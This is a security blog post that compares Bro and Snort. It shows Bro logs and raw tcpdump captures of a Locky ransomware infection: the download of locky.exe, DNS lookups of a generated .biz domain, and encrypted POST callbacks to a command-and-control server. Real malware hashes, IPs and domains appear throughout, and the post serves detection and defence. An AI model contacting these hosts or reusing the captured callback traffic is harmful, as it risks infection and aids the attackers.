BRO vs Snort IDS Locky Ransomware tcpdump Traffic Sample Data Packet Analysis

By | July 1, 2016

(PCAP and Binary samples available with their usual password and location)

Bro and Snort are completely different types of applications although they are commonly compared against one another. From a network security standpoint Snort can’t do much to detect new malware variants, obfuscation TTPs and other non-low hanging fruit we haven’t created a signature for.

Bro gives us the ability to detect malware as close to 0day as we could hope for with a few simple tricks. Once you have enabled all Bro logging options you will have SHA1 and MD5 hashes for files and certificates that are traversing your network. Bro by itself is nothing more than a logging interface, it can easily be turned into an IDS. Anti-Virus software depends upon signatures, heuristics and patterns that have been fed to it for detection, this type of detection is far from real time but for most of us it is as good as it gets.

When I submitted the Locky ransomware sample here “https://www.virustotal.com/en/file/84505a6be0fdca95e71003afcab8df228065f687436f0271d2a27f6dc7479fc5/analysis/” for scan it had a detection rate of 4/50 (by now most of the AV suites are detecting it) with only Trend Micro AV actually detecting it as Locky. We can use Bro as an enhanced anti-virus suite by leveraging all of the major software providers intel at once. File samples are submitted all over the Internet at different rates and to different vendors with almost all having rss feeds and Google search console updates almost instantly. If we create a simple python script to cURL all of the major vendors feeds and index the file hashes and indicators of compromise we can essentially leverage the collective knowledge of all of the major vendors without a paid subscription to any. Create a cronjob to perform a search for the latest entries every 5,10,30,60 minutes or whatever suites your client’s or site’s needs and match them to hashes, IPs and domain names traversing your network.

Here are sample Bro logs of the Locky malware:

https://www.virustotal.com/en/file/84505a6be0fdca95e71003afcab8df228065f687436f0271d2a27f6dc7479fc5/analysis/
SHA256:    84505a6be0fdca95e71003afcab8df228065f687436f0271d2a27f6dc7479fc5

root@computersecurity:/var/log/bro/2016-06-28# zcat files.17\:00\:00-18\:00\:00.log.gz | grep application/x-dos
1467148303.427135       FEQjwH1zOtgq0XUwd       217.74.66.167   192.168.1.100 ChxVZM3W6tGn0jM9ad      HTTP    0       PE,SHA1,MD5     application/x-dosexec   –       1.334915        F       F       269106  269106  0       0       F bef0781693c41bcda3000c8f5ca40e3e 869ba5e59470baac4ef0462b8c9923ac70197b05

https://malwr.com/analysis/NTIwNjc0Zjc1NWJlNDUwOTg5NTA2OWQ3ZTZkZmFkZWQ/
–       –
1467148303.428111       F3ZsZV32sDWqH6jLFj      217.74.66.167   192.168.1.100   CDKmDc28png4js7QY1      HTTP    0       PE,SHA1,MD5     application/x-dosexec   –       1.338627        F       F       269106  269106  0       0       F bef0781693c41bcda3000c8f5ca40e3e 869ba5e59470baac4ef0462b8c9923ac70197b05        –       –

https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj~Agent-ASMW/detailed-analysis.aspx#

root@computersecurity:/var/log/bro/2016-06-28# zcat http.17\:00\:00-18\:00\:00.log.gz | grep 217.74.66.167
1467148303.427135       ChxVZM3W6tGn0jM9ad      192.168.1.100  39868   217.74.66.167   80      1       –       –       –       –       –       0       269106  200     OK      –       –       –       (empty) –       –       –       – FEQjwH1zOtgq0XUwd        application/x-dosexec
1467148303.428111       CDKmDc28png4js7QY1      192.168.1.100   39868   217.74.66.167   80      1       –       –       –       –       –       0       269106  200     OK      –       –       –       (empty) –       –       –       – F3ZsZV32sDWqH6jLFj       application/x-dosexec

root@computersecurity:/var/log/bro/2016-06-28# zcat pe.17\:00\:00-18\:00\:00.log.gz
#separator \x09
#set_separator  ,
#empty_field    (empty)
#unset_field    –
#path   pe
#open   2016-06-28-17-11-45
#fields ts      id      machine compile_ts      os      subsystem       is_exe  is_64bit        uses_aslr       uses_dep        uses_code_integrity     uses_seh        has_import_table        has_export_table        has_cert_table  has_debug_data     section_names
#types  time    string  string  time    string  string  bool    bool    bool    bool    bool    bool    bool    bool    bool    bool    vector[string]
1467148303.427546       FEQjwH1zOtgq0XUwd       I386    1467118146.000000       Windows XP      WINDOWS_GUI     T       F       T       F       F       T       T       F       F       T       .text,.rdata,.data,.rsrc,.reloc
1467148303.429271       F3ZsZV32sDWqH6jLFj      I386    1467118146.000000       Windows XP      WINDOWS_GUI     T       F       T       F       F       T       T       F       F       T       .text,.rdata,.data,.rsrc,.reloc
#close  2016-06-28-18-00-00

root@computersecurity:/var/log/bro/2016-06-28# zcat dns.17\:00\:00-18\:00\:00.log.gz | grep 217.74
1467148303.153851       CAGAOC2ltPBR0uP1fj      192.168.1.100   48407   75.75.75.75     53      udp     6278    ratownictwo.strefa.pl   –       –       –       –       0       NOERROR F       F       F       T       0       217.74.66.167      600.000000      F
1467148303.153406       CC6Pi1y2ccItuEWSd       192.168.1.100 53627   75.75.75.75     53      udp     6278    ratownictwo.strefa.pl   –       –       –       –       0       NOERROR F       F       F       T       0       217.74.66.167      600.000000      F

Callback Traffic:

root@computersecurity:/var/log/bro/2016-06-28# zcat conn.18\:00\:00-19\:00\:00.log.gz | grep 151.236.15.226
1467152337.859581 CdsNLi2wzTqFogbC75 192.168.1.100 57436 151.236.15.226 80 tcp http 4.752286 5249 0 S0 T F 0 SAD 14 5821 0 0 (empty)
1467152337.963955 Cib4i04qmEJujDylCf 192.168.1.100 57436 151.236.15.226 80 tcp – 284.882985 0 12631 SHR T F 0 hadf 0 0 28 13763 (empty)
1467152357.463053 CPlEdm3dmsVSNedE32 192.168.1.100 57436 151.236.15.226 80 tcp – 265.384630 3913 0 OTH T F 0 DA 10 4313 0 0 (empty)
1467153134.228094 Cpm6U13YlnzxKjNtmh 192.168.1.100 57436 151.236.15.226 80 tcp – – – – SH T F 0 F 1 40 0 0 (empty)
1467153134.328506 Cp7e6NpP3PwGqcmZb 192.168.1.100 57436 151.236.15.226 80 tcp – – – – RSTRH T F 0 r 0 0 1 40 (empty)
1467153638.321168 CL8b5C1mJEASLDOHA2 192.168.1.100 58128 151.236.15.226 80 tcp http 2.884468 3615 0 S0 T F 0 SAD 12 4107 0 0 (empty)
1467153643.383005 CT8caj2DDA5gKnacu1 192.168.1.100 58128 151.236.15.226 80 tcp – 82.386675 9170 0 SH T F 0 DAF 20 9970 0 0 (empty)
1467153638.425665 Cyb5P42KRdZGCumUk3 192.168.1.100 58128 151.236.15.226 80 tcp – 87.343249 0 12321 SHR T F 0 hadf 0 0 35 13733 (empty)

root@computersecurity:/var/log/bro/2016-06-28# zcat dns.18\:00\:00-19\:00\:00.log.gz | grep .biz
1467152335.499772 CkcKxg3Vgocx5ZP7Jj 192.168.1.100 55462 75.75.75.75 53 udp 18771 wjfkoqueatxdmqw.biz 1 C_INTERNET 1 A – – F F T F 0 – F
1467152336.511728 C4Y4s5z3hBIdCnoe9 192.168.1.100 55463 75.75.75.75 53 udp 18771 wjfkoqueatxdmqw.biz 1 C_INTERNET 1 A – – F F T F 0 – F
1467152337.505404 CvpNyI34kpJnmHYJ6e 192.168.1.100 55462 75.75.76.76 53 udp 18771 wjfkoqueatxdmqw.biz 1 C_INTERNET 1 A – – F F T F 0 – F
1467152337.505803 CjkpHg1Wv2ApzPn2D1 192.168.1.100 55464 75.75.75.75 53 udp 18771 wjfkoqueatxdmqw.biz 1 C_INTERNET 1 A – – F F T F 0 – F
1467152337.857609 C3u42t4W5TL1Nojhsd 192.168.1.100 24552 75.75.76.76 53 udp 18771 wjfkoqueatxdmqw.biz – – – – 0 NOERROR F F F T 0 151.236.15.226 600.000000 F
1467152338.505541 Co5Hqy1qM8cU8rcph 192.168.1.100 55463 75.75.76.76 53 udp 18771 wjfkoqueatxdmqw.biz 1 C_INTERNET 1 A – – F F T F 0 – F
1467152338.843204 Ccl0T84oBNlsGJcE6c 192.168.1.100 50262 75.75.76.76 53 udp 18771 wjfkoqueatxdmqw.biz – – – – 0 NOERROR F F F T 0 151.236.15.226 600.000000 F
1467152339.507084 CVEg303R9VQw6MigZk 192.168.1.100 55464 75.75.76.76 53 udp 18771 wjfkoqueatxdmqw.biz 1 C_INTERNET 1 A – – F F T F 0 – F

root@computersecurity:/var/log/bro/2016-06-28# zcat files.18\:00\:00-19\:00\:00.log.gz | grep 151.236.15.226
1467152338.072969       FUEGOP2CN9E2bA2xIf      192.168.1.100   151.236.15.226  CdsNLi2wzTqFogbC75      HTTP    0       SHA1,MD5        text/plain      –       0.000000        T       T       1126    1126    0       0       F       – 873420329f0835e13de6b696e31353e8 f933bcc846985318b2b574801e442ab98494b14b        –       –
1467152338.467968       FJQWHF1BLLIO3la3p1      151.236.15.226  192.168.1.100  Cib4i04qmEJujDylCf      HTTP    0       SHA1,MD5        –       –       0.000000        F       F       313     313     0       0       F       –       2986b2044d6bb6a5dafb4e2966c26d1a   9f6a15adf63c7c2b1ae5bbaa627742db86fceade        –       –
1467152338.581431       F4FVGV3dQLX8tHAir6      192.168.1.100   151.236.15.226  CdsNLi2wzTqFogbC75      HTTP    0       SHA1,MD5        text/plain      –       0.000000        T       T       790     790     0       0       F       – 9697ae3ef8f8f7ce2c6c70c69690ff16 26b0b1cbc1be7361db78b125bd2a9df05b5b7df1        –       –
1467152338.966439       FFqoA33xdIAhANt7nd      151.236.15.226  192.168.1.100  Cib4i04qmEJujDylCf      HTTP    0       SHA1,MD5        –       –       0.000000        F       F       1195    1195    0       0       F       –       f7d46ab6b7754b656669da1046c77e30   8058dabfe112e1d84458170c01292423f3f8aa2b        –       –
1467152338.968820       F3vIQz1MXORQkl871i      192.168.1.100   151.236.15.226  CdsNLi2wzTqFogbC75      HTTP    0       SHA1,MD5        text/plain      –       0.000000        T       T       490     490     0       0       F       – 2bf68f81591033199bdb28b2bd7aadc8 ad28c783a43dfa1594d44d1a96d4482248a9d113        –       –
1467152339.368526       FY1BJMa0OBilCocI1       151.236.15.226  192.168.1.100  Cib4i04qmEJujDylCf      HTTP    0       SHA1,MD5        –       –       0.070727        F       F       9491    9491    0       0       F       –       26931832cc92296c9c037803530da456   a0bf3aea40193ab452745675b24eeb96c78e6477        –       –
1467152342.155877       FeOxTb4AK7XOgpZ3B4      192.168.1.100   151.236.15.226  CdsNLi2wzTqFogbC75      HTTP    0       SHA1,MD5        text/plain      –       0.000000        T       T       1201    1201

 

If you are creating Snort rules in a very paranoid manner you may have detected the payload request or POST requests without a referrer. Creating Snort rules based on URI content is a frivilous endeavor as almost all crimeware groups these days use hacked infrastructure to host their malicious content. If you think a POST request to /wp-content// you have much to learn. These kiddies are Google dorking the latest stored XSS and SQLi to upload their package, there is nothing finite about this location. If your client base is small enough it would be smart to create rules that alert on binary downloads and POST requests without referrers using a whitelist based method. Detecting this below type of traffic as malicious will become axiomatic.
E..c66…..r…kh.T….P’..@.U.DP…1…GET /images/samples/locky.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive

2016-06-28 18:18:57.969089 IP 192.168.1.107.57436 > 151.236.15.226.80: Flags [.], ack 2729606803, win 256, length 0
E..(\…..t….k…..\.Pl…..~.P….7……..
2016-06-28 18:18:57.969599 IP 192.168.1.107.57436 > 151.236.15.226.80: Flags [P.], seq 0:411, ack 1, win 256, length 411: HTTP: POST /upload/_dispatch.php HTTP/1.1
E…\…..sO…k…..\.Pl…..~.P…”…POST /upload/_dispatch.php HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: http://wjfkoqueatxdmqw.biz/upload/
x-requested-with: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)
Host: wjfkoqueatxdmqw.biz
Content-Length: 1126
Connection: Keep-Alive
2016-06-28 18:18:58.072969 IP 192.168.1.107.57436 > 151.236.15.226.80: Flags [P.], seq 411:1537, ack 1, win 256, length 1126: HTTP
E…\…..p….k…..\.Pl…..~.P….M..qhhxAGOv=%D1%98%85%5C%05%99lh%F6%FDL%9A%D7%06%18%7B%A9%D15%3A%185%29%12%99BM%A0%C0%BEf%DA&BFfex=%DA%08y%88%AE%08%3C%01%3DO%B8%14B%15%D5&xMvFbKR=M%8D%FF%22%00%1D%D1%AD%AC%C
F9%E5%FBw%D9R%1C%89–%F9%22R%C9%A3%5B4%5CH%27%889Q-%8F%156u%9A%24%AF&xaN=%E0%0F5%CE%27%0B%2A%0A%7CHzu%87%8A%CD%B9%DAD%F2%F9%B0%D6%94gI%0F%3Fp%B0%08%DA3%E5%97%97%C5%7B%AF%1A%95%FC&IbGveoKJ=B%AE%8D%22%EB%F6%08%F6%
7E%D0%8FW9Q%D2%01%B0NE%0C%0E%A5%266%E0%1C%C6vt%3C%D9J%8Et%A0%22&vxzi=%9F%E1%FD%93%0A%E6%FA%3D%F4%99%C6%FE%C7x%BE%B4%14%5D%00%EDp%C3B%1B%26u%A7%0A%CEC%DC%CBi%9D%EB%3F%1F%B64%91%94%C4%80%81yo%0B%09&jGkdcQzo=%E2Z%A
2%A7o%EB%C7%3ECe%C6%A1%F4%A6k0%26%93%9B%B8%9E%0Fb%83%E3kS%16g%D6%FA%B3%FD%FE%E8%FAx%DB%8E%0A%FE%F44%3Cg%18%D6%BA%01%EF&MzAP=%F8%1F%D3zy%C64%FB%1F%97%8A%89%86%82%2CR%C8%FC%18%C7%3Dei%C4%B8%B9%173G&luuff=%CB%09%88
%94%C0%0A%A4%E1%B6%EFY%FB%BCs%3F%C3%FE%B1%A5%DA%2A%B2%2F%04%0B%D0F%BC%28%F3%86%CAE%2F-%D8%BB%87%CBy%3D%EF%A1%DB%B2%BA%60%D3&SjY=%B6%C8%C7%04%E8f%03%07+%40%B6Y%CF%FFV%AF%0B5%A7c%BC8%AE%BF%7C%97Q%D73%1F%BF&IdEM=%9
6%25%DC%40%9F%C1%AF%A8%14%AC%9B%BFf%89%B6%D1%08%FC%90d%B3%8D%05%EF%3E%5EC%E2.y%82%1A%5C%DD%3F%13%CDF%91%BC%E69c
2016-06-28 18:18:58.470622 IP 192.168.1.107.57436 > 151.236.15.226.80: Flags [P.], seq 1537:1947, ack 470, win 254, length 410: HTTP: POST /upload/_dispatch.php HTTP/1.1
E…\…..sN…k…..\.Pl……hP…h…POST /upload/_dispatch.php HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: http://wjfkoqueatxdmqw.biz/upload/
x-requested-with: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)
Host: wjfkoqueatxdmqw.biz
Content-Length: 790
Connection: Keep-Alive
2016-06-28 18:18:58.581431 IP 192.168.1.107.57436 > 151.236.15.226.80: Flags [P.], seq 1947:2737, ack 470, win 254, length 790: HTTP
E..>\…..q….k…..\.Pl……hP…9C..uoYu=o%5C%FF%C8%C0P%EC%25%28%2F%B3%95%F6L%D1%1B%CE%C8R%BEf%ED%D3W%88%89%2F&ERKKdCXA=%C6%8A6%A8j%7Ea.x%1C%D7%03%0D%28IR%EF%F4%04%2F%FFr%B5%89%E8%95%E9%01%D8%99%D2ikiu%9F&brnXZ=_%DA%878%84%90%29%1D%C0rL%CD%13%BEn%F8%AA%B3%842A%F2%B1%03&jhUtKvK=%D6%B4%9AF%18b%0A%A3%B9%8A%1B7%08y%DA%DDF%84Q%14%0Fq%C9%9F%94%0F%AE%A6T%87%8D%A8%E8%A0%DAn%B2%B6%C4%AE+%E2%97&VKTm=%F3%CB%04%AA%ED%D9Ud%21%40%810%3E%DCZP%AC%84%CA%883%FC-%8D.%ADD%92%A1%E0%7DW%84%D7%96Je%FD%F7%0C%BB%E7%FB%02%D5%DF&Rxu=1%FA%94%CF%0F%FC%5EaG%B3%1B%83j%CCBa%DA%A6%A8n%C3%D8%F2C&vbJTIM=o%A8%8A%01%12%B2%AA%9A%C3%A6%84N%ED%12%8D%AF%3E%D8%23%C6%EEN%ED%C8%BC%E4%5B%D9%A9%86%DE%DB%B9%C4%D4%7E&IfQDnFS=%17%DF%1C%2C%7B%B0x%BE+%94SC%24d%97N%F1Q%C0%F1%A3%A6D%AF%8Br_%AC%C8%1Dy%DB%FAK%E0%E3a%0D%12W%C7%E6%98%3C%D1%B2&FFcT=%BF%7BI%1DL%5Ck%E5H%A7M
2016-06-28 18:18:58.968820 IP 192.168.1.107.57436 > 151.236.15.226.80: Flags [P.], seq 2737:3637, ack 1822, win 256, length 900: HTTP: POST /upload/_dispatch.php HTTP/1.1
E…\…..qb…k…..\.Pl…….P…p!..POST /upload/_dispatch.php HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: http://wjfkoqueatxdmqw.biz/upload/
x-requested-with: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)
Host: wjfkoqueatxdmqw.biz
Content-Length: 490
Connection: Keep-Alive

NrpyxWG=%2C%80%22%FD%92V%2A%8D%CA%2B%BFq%02%EA%5Cf0l%C0%B40%1E%12%F9%84%12%FA%9C1&QWo=%E7%F7%F7%17%89m%3C%D5%88%7F%1F%24%80%90%DA%D7%FCV&nYuMPFS=%AC%3B%B3%F2%96GD_%17%E4%3F%1E%C0%DE%9B%DAI2%F3E%C3PV%85%C1%5Dr%1F%95l%01%5B%00%C9%98ES&wVmT=Z%94%0F%BF5%A1%B4%7C%BD%2A%EB7%0D%5D%E0%DB%7F%D7%1B%CE%81k3x%B3t%AE%EB%84H%B3%3B%84Or%10&RugliT=%1E%2B%B69%0C%18%EA7p%28%E8%E0%8CKSg%DAq%89%00%26%26%93%8F%B5b%10%29%C6&JajgLtjP=%D2%07%7CW%FC%2F%8D%BC%AE%B3Y%DD%06%9D%17%D2%AB%CC%8A%8C%CF%87%E0%1F%22+%7D
2016-06-28 18:18:59.369955 IP 192.168.1.107.57436 > 151.236.15.226.80: Flags [.], ack 4742, win 256, length 0
E..(\ ….t….k…..\.Pl../….P….}……..
2016-06-28 18:18:59.371198 IP 192.168.1.107.57436 > 151.236.15.226.80: Flags [.], ack 7401, win 256, length 0
E..(\
….t….k…..\.Pl../…{P………….

2016-06-28 18:19:02.054922 IP 192.168.1.107.57436 > 151.236.15.226.80: Flags [P.], seq 3637:4048, ack 11470, win 251, length 411: HTTP: POST /upload/_dispatch.php HTTP/1.1
E…\…..sF…k…..\.Pl../…`P…….POST /upload/_dispatch.php HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: http://wjfkoqueatxdmqw.biz/upload/
x-requested-with: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)
Host: wjfkoqueatxdmqw.biz
Content-Length: 1201
Connection: Keep-Alive
2016-06-28 18:19:02.155877 IP 192.168.1.107.57436 > 151.236.15.226.80: Flags [P.], seq 4048:5249, ack 11470, win 251, length 1201: HTTP
E…\…..p/…k…..\.Pl……`P…….JpByd=x5%90d%F6%0Dy5%C8%A2%A1%D0J%2B%1D%15%87%3F%B4%2C&nJCDmH=%5B%CB%81%80%23%03%E5%3F%E1%A9wN7%E5%C8%D6%B8HMi%A5%A7%5B%60%01Fdi-%D4%F3%F4%3D%93%08q%A5b%9A%B55%15%96%DCW&qdZEWyNE=gY%28%EB%00%E6%0D%DE%5EN9%FFt%26%EA%C8%CE%60%09%03%B3JH&mwjESzr=%FF%D7B%FDr%84%ECT%87%B8%A5%9AS%1E%9D%98%AES%D1%81%D6%A9N%D1%C9%E2f%EA%8ENWi%7D%BF%950%95%BFE&plR=%C4%AEm%01%93%83%C0%9B%D3%7D%1Cx%22e%B5%9DJ%FCF%17%A4%25%3B&qieYfPY=MRR%8FU%CA%24%83%FF%A6%82%D7e%DF%3E%18%BBB%B0&ZjtvTgwY=%5E%D4%B6%F2E%CD%CF%B8%3A%8A%9B%FD%A4%93S%F9mK%B5%AC%22%E3%29%1BM%E7%2B7%E5kiQ%F1%AA%A8%23%EB%B4x%B3%83&olFyl=4G%92%AE%13%B8%18%28%99%E7%3F9D%B0%87%9C%5Bp%CCAQo%0B%269%E4V&kvU=%17%DBS%B2%FB%E3%A8%8D.A%A3%A0%0B%FCn.4%02%25X%88%00MRj%3D%F6%B7%5B%7E&IsEhd=%EB%1Ds%8C%0E%D3Z%E7%F1lp%3F%7E%C2_%C1%BDJ%01%A2%8C%10%A3XDA%B0L%3F%E3&wqfi=%C8L%FAU%B5%8A%0B%7B%0A%B2%D8%18%3BO%EB%AB%23H%BAF%CC%C3h%DBX%A2%0D%B5-%C4%ED%03%08%C8O%8F%C3%D9&PkzlsNj=%29%09%23J%0CkD%BBj1%FB%C2AVV%2Cl%C6%26%9E4%1C%80%3A%A9%034%C9%ED%E63%F2&zKqqM=%CA%86%B4%0Dc%E7%C0%85%9A%0E%E1Z%5B%E9%86%0D%C1%CE%05%3C%85%9D%11%DF%18&qHuJo=g%ABxSUa%F11%C3%9B%05%DB%09%A5%28%AA%C8b%85%0B4n%27k%1BG&EhsFEGN=%88i.n%16%AD3%7E.p%C6%AF%C2%B6%03%9B%2B%E3C%8A%29%1F%FE%F5Oe2%0Et%DF%C3%D9B%CE%85
2016-06-28 18:19:02.611867 IP 192.168.1.107.57436 > 151.236.15.226.80: Flags [.], ack 11881, win 256, length 0
E..(\…..t….k…..\.Pl.#{….P….N……..

 

Share Button